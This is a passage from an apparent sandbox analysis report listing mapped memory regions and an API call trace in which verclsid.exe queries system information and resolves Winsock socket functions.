filename = "\\Windows\\System32\\IPHLPAPI.DLL" (normalized: "c:\\windows\\system32\\iphlpapi.dll")
Region:
id = 4676
start_va = 0x7fefb660000
end_va = 0x7fefb66afff
monitored = 0
entry_point = 0x7fefb661198
region_type = mapped_file
name = "winnsi.dll"
filename = "\\Windows\\System32\\winnsi.dll" (normalized: "c:\\windows\\system32\\winnsi.dll")
Region:
id = 4677
start_va = 0x7fefc970000
end_va = 0x7fefc976fff
monitored = 0
entry_point = 0x7fefc9711a0
region_type = mapped_file
name = "shfolder.dll"
filename = "\\Windows\\System32\\shfolder.dll" (normalized: "c:\\windows\\system32\\shfolder.dll")
Region:
id = 4678
start_va = 0x170000
end_va = 0x170fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000170000"
filename = ""
Region:
id = 4679
start_va = 0x1a0000
end_va = 0x1affff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000001a0000"
filename = ""
Region:
id = 4680
start_va = 0x1eb0000
end_va = 0x217efff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "sortdefault.nls"
filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls")
Region:
id = 4681
start_va = 0x7fefb7f0000
end_va = 0x7fefb804fff
monitored = 0
entry_point = 0x7fefb7f60d8
region_type = mapped_file
name = "nlaapi.dll"
filename = "\\Windows\\System32\\nlaapi.dll" (normalized: "c:\\windows\\system32\\nlaapi.dll")
Region:
id = 4682
start_va = 0x2180000
end_va = 0x22fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002180000"
filename = ""
Region:
id = 4683
start_va = 0x2180000
end_va = 0x226ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002180000"
filename = ""
Region:
id = 4684
start_va = 0x22f0000
end_va = 0x22fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000022f0000"
filename = ""
Region:
id = 4685
start_va = 0x7fefaa30000
end_va = 0x7fefaa44fff
monitored = 0
entry_point = 0x7fefaa312a0
region_type = mapped_file
name = "napinsp.dll"
filename = "\\Windows\\System32\\NapiNSP.dll" (normalized: "c:\\windows\\system32\\napinsp.dll")
Region:
id = 4686
start_va = 0x2460000
end_va = 0x24dffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002460000"
filename = ""
Region:
id = 4687
start_va = 0x7fefaa50000
end_va = 0x7fefaa68fff
monitored = 0
entry_point = 0x7fefaa5177c
region_type = mapped_file
name = "pnrpnsp.dll"
filename = "\\Windows\\System32\\pnrpnsp.dll" (normalized: "c:\\windows\\system32\\pnrpnsp.dll")
Region:
id = 4688
start_va = 0x7fffffdc000
end_va = 0x7fffffddfff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffffdc000"
filename = ""
Region:
id = 4689
start_va = 0x7fefd430000
end_va = 0x7fefd484fff
monitored = 0
entry_point = 0x7fefd431054
region_type = mapped_file
name = "mswsock.dll"
filename = "\\Windows\\System32\\mswsock.dll" (normalized: "c:\\windows\\system32\\mswsock.dll")
Region:
id = 4690
start_va = 0x7fefd2b0000
end_va = 0x7fefd30afff
monitored = 0
entry_point = 0x7fefd2b6940
region_type = mapped_file
name = "dnsapi.dll"
filename = "\\Windows\\System32\\dnsapi.dll" (normalized: "c:\\windows\\system32\\dnsapi.dll")
Region:
id = 4691
start_va = 0x24e0000
end_va = 0x272ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000024e0000"
filename = ""
Region:
id = 4692
start_va = 0x7fefa7d0000
end_va = 0x7fefa7dafff
monitored = 0
entry_point = 0x7fefa7d12e0
region_type = mapped_file
name = "winrnr.dll"
filename = "\\Windows\\System32\\winrnr.dll" (normalized: "c:\\windows\\system32\\winrnr.dll")
Region:
id = 4693
start_va = 0x2200000
end_va = 0x227ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002200000"
filename = ""
Region:
id = 4694
start_va = 0x7fffffda000
end_va = 0x7fffffdbfff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffffda000"
filename = ""
Region:
id = 4695
start_va = 0x7fefc0a0000
end_va = 0x7fefc0b7fff
monitored = 0
entry_point = 0x7fefc0a1130
region_type = mapped_file
name = "dwmapi.dll"
filename = "\\Windows\\System32\\dwmapi.dll" (normalized: "c:\\windows\\system32\\dwmapi.dll")
Region:
id = 4714
start_va = 0x7fefc530000
end_va = 0x7fefc65bfff
monitored = 0
entry_point = 0x7fefc5394bc
region_type = mapped_file
name = "propsys.dll"
filename = "\\Windows\\System32\\propsys.dll" (normalized: "c:\\windows\\system32\\propsys.dll")
Region:
id = 4715
start_va = 0x180000
end_va = 0x181fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000180000"
filename = ""
Region:
id = 4716
start_va = 0x7fefc6b0000
end_va = 0x7fefc8a3fff
monitored = 0
entry_point = 0x7fefc83c924
region_type = mapped_file
name = "comctl32.dll"
filename = "\\Windows\\winsxs\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac\\comctl32.dll")
Region:
id = 4717
start_va = 0x190000
end_va = 0x190fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "windowsshell.manifest"
filename = "\\Windows\\WindowsShell.Manifest" (normalized: "c:\\windows\\windowsshell.manifest")
Region:
id = 4718
start_va = 0x300000
end_va = 0x301fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000300000"
filename = ""
Region:
id = 4719
start_va = 0x7fef5d80000
end_va = 0x7fef6936fff
monitored = 0
entry_point = 0x7fef5d81bd8
region_type = mapped_file
name = "ieframe.dll"
filename = "\\Windows\\System32\\ieframe.dll" (normalized: "c:\\windows\\system32\\ieframe.dll")
Region:
id = 4720
start_va = 0x77e00000
end_va = 0x77e06fff
monitored = 0
entry_point = 0x77e0106c
region_type = mapped_file
name = "psapi.dll"
filename = "\\Windows\\System32\\psapi.dll" (normalized: "c:\\windows\\system32\\psapi.dll")
Region:
id = 4721
start_va = 0x7fef5d20000
end_va = 0x7fef5d73fff
monitored = 0
entry_point = 0x7fef5d2104c
region_type = mapped_file
name = "oleacc.dll"
filename = "\\Windows\\System32\\oleacc.dll" (normalized: "c:\\windows\\system32\\oleacc.dll")
Region:
id = 4722
start_va = 0x190000
end_va = 0x190fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "oleaccrc.dll"
filename = "\\Windows\\System32\\oleaccrc.dll" (normalized: "c:\\windows\\system32\\oleaccrc.dll")
Region:
id = 4723
start_va = 0x310000
end_va = 0x311fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000310000"
filename = ""
Region:
id = 4724
start_va = 0x2540000
end_va = 0x25bffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002540000"
filename = ""
Region:
id = 4725
start_va = 0x26b0000
end_va = 0x272ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000026b0000"
filename = ""
Region:
id = 4726
start_va = 0x7fffffd8000
end_va = 0x7fffffd9fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffffd8000"
filename = ""
Region:
id = 4727
start_va = 0x7feff990000
end_va = 0x7feffb66fff
monitored = 0
entry_point = 0x7feff991010
region_type = mapped_file
name = "setupapi.dll"
filename = "\\Windows\\System32\\setupapi.dll" (normalized: "c:\\windows\\system32\\setupapi.dll")
Region:
id = 4728
start_va = 0x7fefdda0000
end_va = 0x7fefddd5fff
monitored = 0
entry_point = 0x7fefdda1474
region_type = mapped_file
name = "cfgmgr32.dll"
filename = "\\Windows\\System32\\cfgmgr32.dll" (normalized: "c:\\windows\\system32\\cfgmgr32.dll")
Region:
id = 4729
start_va = 0x7fefdcd0000
end_va = 0x7fefdce9fff
monitored = 0
entry_point = 0x7fefdcd1558
region_type = mapped_file
name = "devobj.dll"
filename = "\\Windows\\System32\\devobj.dll" (normalized: "c:\\windows\\system32\\devobj.dll")
Region:
id = 4730
start_va = 0x320000
end_va = 0x32cfff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "setupapi.dll.mui"
filename = "\\Windows\\System32\\en-US\\setupapi.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\setupapi.dll.mui")
Region:
id = 4731
start_va = 0x22d0000
end_va = 0x234ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000022d0000"
filename = ""
Region:
id = 4732
start_va = 0x7fffffd5000
end_va = 0x7fffffd6fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffffd5000"
filename = ""
Region:
id = 4733
start_va = 0x7fefbc00000
end_va = 0x7fefbc2cfff
monitored = 0
entry_point = 0x7fefbc01010
region_type = mapped_file
name = "ntmarta.dll"
filename = "\\Windows\\System32\\ntmarta.dll" (normalized: "c:\\windows\\system32\\ntmarta.dll")
Region:
id = 4734
start_va = 0x7fefe110000
end_va = 0x7fefe161fff
monitored = 0
entry_point = 0x7fefe1110d4
region_type = mapped_file
name = "wldap32.dll"
filename = "\\Windows\\System32\\Wldap32.dll" (normalized: "c:\\windows\\system32\\wldap32.dll")
Region:
id = 4735
start_va = 0x330000
end_va = 0x333fff
monitored = 1
entry_point = 0x0
region_type = mapped_file
name = "cversions.1.db"
filename = "\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\Caches\\cversions.1.db" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\microsoft\\windows\\caches\\cversions.1.db")
Region:
id = 4736
start_va = 0x2180000
end_va = 0x21a7fff
monitored = 1
entry_point = 0x0
region_type = mapped_file
name = "{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x000000000000000e.db"
filename = "\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\Caches\\{AFBF9F1A-8EE8-4C77-AF34-C647E37CA0D9}.1.ver0x000000000000000e.db" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\microsoft\\windows\\caches\\{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x000000000000000e.db")
Region:
id = 4737
start_va = 0x340000
end_va = 0x340fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000340000"
filename = ""
Region:
id = 4738
start_va = 0x2350000
end_va = 0x2450fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002350000"
filename = ""
Region:
id = 4739
start_va = 0x2350000
end_va = 0x2450fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002350000"
filename = ""
Region:
id = 4740
start_va = 0x2350000
end_va = 0x2450fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002350000"
filename = ""
Region:
id = 4741
start_va = 0x7fefdb80000
end_va = 0x7fefdb8efff
monitored = 0
entry_point = 0x7fefdb819b0
region_type = mapped_file
name = "profapi.dll"
filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll")
Region:
id = 4742
start_va = 0x330000
end_va = 0x333fff
monitored = 1
entry_point = 0x0
region_type = mapped_file
name = "cversions.2.db"
filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db")
Region:
id = 4743
start_va = 0x21b0000
end_va = 0x21dffff
monitored = 1
entry_point = 0x0
region_type = mapped_file
name = "{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x0000000000000019.db"
filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x0000000000000019.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x0000000000000019.db")
Region:
id = 4744
start_va = 0x1c50000
end_va = 0x1c53fff
monitored = 1
entry_point = 0x0
region_type = mapped_file
name = "cversions.2.db"
filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db")
Region:
id = 4745
start_va = 0x2350000
end_va = 0x23b5fff
monitored = 1
entry_point = 0x0
region_type = mapped_file
name = "{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000002.db"
filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{DDF571F2-BE98-426D-8288-1A9A39C3FDA2}.2.ver0x0000000000000002.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000002.db")
Region:
id = 4746
start_va = 0x1ce0000
end_va = 0x1cedfff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "propsys.dll.mui"
filename = "\\Windows\\System32\\en-US\\propsys.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\propsys.dll.mui")
Region:
id = 4747
start_va = 0x1cf0000
end_va = 0x1d6ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001cf0000"
filename = ""
Region:
id = 4748
start_va = 0x7fefda40000
end_va = 0x7fefda64fff
monitored = 0
entry_point = 0x7fefda49658
region_type = mapped_file
name = "sspicli.dll"
filename = "\\Windows\\System32\\sspicli.dll" (normalized: "c:\\windows\\system32\\sspicli.dll")
Region:
id = 4749
start_va = 0x21e0000
end_va = 0x21e0fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000021e0000"
filename = ""
Region:
id = 5207
start_va = 0x21f0000
end_va = 0x21f0fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000021f0000"
filename = ""
Region:
id = 5208
start_va = 0x2280000
end_va = 0x2283fff
monitored = 1
entry_point = 0x0
region_type = mapped_file
name = "cversions.2.db"
filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db")
Region:
id = 5269
start_va = 0x7fefb7f0000
end_va = 0x7fefb804fff
monitored = 0
entry_point = 0x7fefb7f60d8
region_type = mapped_file
name = "nlaapi.dll"
filename = "\\Windows\\System32\\nlaapi.dll" (normalized: "c:\\windows\\system32\\nlaapi.dll")
Region:
id = 5270
start_va = 0x2730000
end_va = 0x28dffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002730000"
filename = ""
Region:
id = 5271
start_va = 0x25c0000
end_va = 0x269ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000025c0000"
filename = ""
Region:
id = 5272
start_va = 0x7fefaa30000
end_va = 0x7fefaa44fff
monitored = 0
entry_point = 0x7fefaa312a0
region_type = mapped_file
name = "napinsp.dll"
filename = "\\Windows\\System32\\NapiNSP.dll" (normalized: "c:\\windows\\system32\\napinsp.dll")
Region:
id = 5273
start_va = 0x7fefaa50000
end_va = 0x7fefaa68fff
monitored = 0
entry_point = 0x7fefaa5177c
region_type = mapped_file
name = "pnrpnsp.dll"
filename = "\\Windows\\System32\\pnrpnsp.dll" (normalized: "c:\\windows\\system32\\pnrpnsp.dll")
Region:
id = 5274
start_va = 0x7fefd430000
end_va = 0x7fefd484fff
monitored = 0
entry_point = 0x7fefd431054
region_type = mapped_file
name = "mswsock.dll"
filename = "\\Windows\\System32\\mswsock.dll" (normalized: "c:\\windows\\system32\\mswsock.dll")
Region:
id = 5275
start_va = 0x7fefa7d0000
end_va = 0x7fefa7dafff
monitored = 0
entry_point = 0x7fefa7d12e0
region_type = mapped_file
name = "winrnr.dll"
filename = "\\Windows\\System32\\winrnr.dll" (normalized: "c:\\windows\\system32\\winrnr.dll")
Region:
id = 5310
start_va = 0x7fefb050000
end_va = 0x7fefb0a2fff
monitored = 0
entry_point = 0x7fefb052b98
region_type = mapped_file
name = "fwpuclnt.dll"
filename = "\\Windows\\System32\\FWPUCLNT.DLL" (normalized: "c:\\windows\\system32\\fwpuclnt.dll")
Region:
id = 5311
start_va = 0x23c0000
end_va = 0x244ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000023c0000"
filename = ""
Region:
id = 5312
start_va = 0x7fefb580000
end_va = 0x7fefb587fff
monitored = 0
entry_point = 0x7fefb581414
region_type = mapped_file
name = "rasadhlp.dll"
filename = "\\Windows\\System32\\rasadhlp.dll" (normalized: "c:\\windows\\system32\\rasadhlp.dll")
Region:
id = 5322
start_va = 0x7fefb7f0000
end_va = 0x7fefb804fff
monitored = 0
entry_point = 0x7fefb7f60d8
region_type = mapped_file
name = "nlaapi.dll"
filename = "\\Windows\\System32\\nlaapi.dll" (normalized: "c:\\windows\\system32\\nlaapi.dll")
Region:
id = 5323
start_va = 0x25c0000
end_va = 0x268ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000025c0000"
filename = ""
Region:
id = 5324
start_va = 0x2730000
end_va = 0x28bffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002730000"
filename = ""
Region:
id = 5325
start_va = 0x7fefaa30000
end_va = 0x7fefaa44fff
monitored = 0
entry_point = 0x7fefaa312a0
region_type = mapped_file
name = "napinsp.dll"
filename = "\\Windows\\System32\\NapiNSP.dll" (normalized: "c:\\windows\\system32\\napinsp.dll")
Region:
id = 5326
start_va = 0x7fefaa50000
end_va = 0x7fefaa68fff
monitored = 0
entry_point = 0x7fefaa5177c
region_type = mapped_file
name = "pnrpnsp.dll"
filename = "\\Windows\\System32\\pnrpnsp.dll" (normalized: "c:\\windows\\system32\\pnrpnsp.dll")
Region:
id = 5327
start_va = 0x7fefd430000
end_va = 0x7fefd484fff
monitored = 0
entry_point = 0x7fefd431054
region_type = mapped_file
name = "mswsock.dll"
filename = "\\Windows\\System32\\mswsock.dll" (normalized: "c:\\windows\\system32\\mswsock.dll")
Region:
id = 5328
start_va = 0x7fefa7d0000
end_va = 0x7fefa7dafff
monitored = 0
entry_point = 0x7fefa7d12e0
region_type = mapped_file
name = "winrnr.dll"
filename = "\\Windows\\System32\\winrnr.dll" (normalized: "c:\\windows\\system32\\winrnr.dll")
Region:
id = 5329
start_va = 0x7fefb050000
end_va = 0x7fefb0a2fff
monitored = 0
entry_point = 0x7fefb052b98
region_type = mapped_file
name = "fwpuclnt.dll"
filename = "\\Windows\\System32\\FWPUCLNT.DLL" (normalized: "c:\\windows\\system32\\fwpuclnt.dll")
Region:
id = 5330
start_va = 0x2730000
end_va = 0x286ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002730000"
filename = ""
Region:
id = 5331
start_va = 0x28b0000
end_va = 0x28bffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000028b0000"
filename = ""
Region:
id = 5342
start_va = 0x7fefd430000
end_va = 0x7fefd484fff
monitored = 0
entry_point = 0x7fefd431054
region_type = mapped_file
name = "mswsock.dll"
filename = "\\Windows\\System32\\mswsock.dll" (normalized: "c:\\windows\\system32\\mswsock.dll")
Region:
id = 5343
start_va = 0x2730000
end_va = 0x28fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002730000"
filename = ""
Region:
id = 5344
start_va = 0x7fefce10000
end_va = 0x7fefce16fff
monitored = 0
entry_point = 0x7fefce114b0
region_type = mapped_file
name = "wshtcpip.dll"
filename = "\\Windows\\System32\\WSHTCPIP.DLL" (normalized: "c:\\windows\\system32\\wshtcpip.dll")
Thread:
id = 224
os_tid = 0x564
[0550.524] GetCurrentThreadId () returned 0x564
[0550.524] LocalAlloc (uFlags=0x40, uBytes=0x214) returned 0x3778b0
[0550.525] SetThreadLocale (Locale=0x400) returned 1
[0550.526] GetVersion () returned 0x1db10106
[0550.527] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x77b10000
[0550.527] GetProcAddress (hModule=0x77b10000, lpProcName="GetThreadPreferredUILanguages") returned 0x77b14fd0
[0550.527] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x77b10000
[0550.527] GetProcAddress (hModule=0x77b10000, lpProcName="SetThreadPreferredUILanguages") returned 0x77b13d40
[0550.527] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x77b10000
[0550.527] GetProcAddress (hModule=0x77b10000, lpProcName="GetThreadUILanguage") returned 0x77b5bba0
[0550.527] GetSystemInfo (in: lpSystemInfo=0x16d960 | out: lpSystemInfo=0x16d960*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7fffffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x6a06))
[0550.527] GetCommandLineW () returned="verclsid.exe /M /S /C {A78ED123-AB77-406B-9999-2A5D9D2F7FB7}"
[0550.527] GetStartupInfoW (in: lpStartupInfo=0x16d928 | out: lpStartupInfo=0x16d928*(cb=0x68, lpReserved="", lpDesktop="winsta0\\default", lpTitle="", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0xf, hStdOutput=0x21d800000004, hStdError=0x6a06000600010000))
[0550.527] GetACP () returned 0x4e4
[0550.528] GetCurrentThreadId () returned 0x564
[0550.528] GetVersion () returned 0x1db10106
[0550.528] GetVersionExW (in: lpVersionInformation=0x16d87c*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0xfdd3bf92, dwPlatformId=0x7fe, szCSDVersion="\峙砀㘀∀) | out: lpVersionInformation=0x16d87c*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0550.528] LoadLibraryW (lpLibFileName="wsock32.dll") returned 0x7fef7310000
[0550.537] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="closesocket", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11
[0550.537] VirtualAlloc (lpAddress=0x0, dwSize=0x13fff0, flAllocationType=0x1000, flProtect=0x4) returned 0x1d70000
[0550.538] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="closesocket", cchWideChar=11, lpMultiByteStr=0x1ea8d00, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="closesocket", lpUsedDefaultChar=0x0) returned 11
[0550.538] GetProcAddress (hModule=0x7fef7310000, lpProcName="closesocket") returned 0x7feffcd18e0
[0550.538] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="select", cchWideChar=6, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 6
[0550.538] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="select", cchWideChar=6, lpMultiByteStr=0x1ea8d00, cbMultiByte=6, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="select", lpUsedDefaultChar=0x0) returned 6
[0550.538] GetProcAddress (hModule=0x7fef7310000, lpProcName="select") returned 0x7feffcd4da0
[0550.539] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="recvfrom", cchWideChar=8, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8
[0550.539] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="recvfrom", cchWideChar=8, lpMultiByteStr=0x1ea8d00, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="recvfrom", lpUsedDefaultChar=0x0) returned 8
[0550.539] GetProcAddress (hModule=0x7fef7310000, lpProcName="recvfrom") returned 0x7fef73117ac
[0550.539] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="sendto", cchWideChar=6, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 6
[0550.539] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="sendto", cchWideChar=6, lpMultiByteStr=0x1ea8d00, cbMultiByte=6, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="sendto", lpUsedDefaultChar=0x0) returned 6
[0550.539] GetProcAddress (hModule=0x7fef7310000, lpProcName="sendto") returned 0x7feffcdd7f0
[0550.539] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="inet_addr", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9
[0550.539] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="inet_addr", cchWideChar=9, lpMultiByteStr=0x1ea8d00, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="inet_addr", lpUsedDefaultChar=0x0) returned 9
[0550.539] GetProcAddress (hModule=0x7fef7310000, lpProcName="inet_addr") returned 0x7feffcd1350
[0550.539] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="htons", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5
[0550.539] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="htons", cchWideChar=5, lpMultiByteStr=0x1ea8d00, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="htons", lpUsedDefaultChar=0x0) returned 5
[0550.539] GetProcAddress (hModule=0x7fef7310000, lpProcName="htons") returned 0x7feffcd1250
[0550.540] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="setsockopt", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10
[0550.540] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="setsockopt", cchWideChar=10, lpMultiByteStr=0x1ea8d00, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="setsockopt", lpUsedDefaultChar=0x0) returned 10
[0550.540] GetProcAddress (hModule=0x7fef7310000, lpProcName="setsockopt") returned 0x7fef7311664
[0550.540] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="WSAStartup", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10
[0550.540] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="WSAStartup", cchWideChar=10, lpMultiByteStr=0x1ea8d00, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WSAStartup", lpUsedDefaultChar=0x0) returned 10
[0550.540] GetProcAddress (hModule=0x7fef7310000, lpProcName="WSAStartup") returned 0x7feffcd4980
[0550.540] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="socket", cchWideChar=6, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 6
[0550.540] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="socket", cchWideChar=6, lpMultiByteStr=0x1ea8d00, cbMultiByte=6, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="socket", lpUsedDefaultChar=0x0) returned 6
[0550.540] GetProcAddress (hModule=0x7fef7310000, lpProcName="socket") returned 0x7feffcdde90
[0550.540] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="WSACleanup", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10
[0550.540] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="WSACleanup", cchWideChar=10, lpMultiByteStr=0x1ea8d00, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WSACleanup", lpUsedDefaultChar=0x0) returned 10
[0550.540] GetProcAddress (hModule=0x7fef7310000, lpProcName="WSACleanup") returned 0x7feffcd4cc0
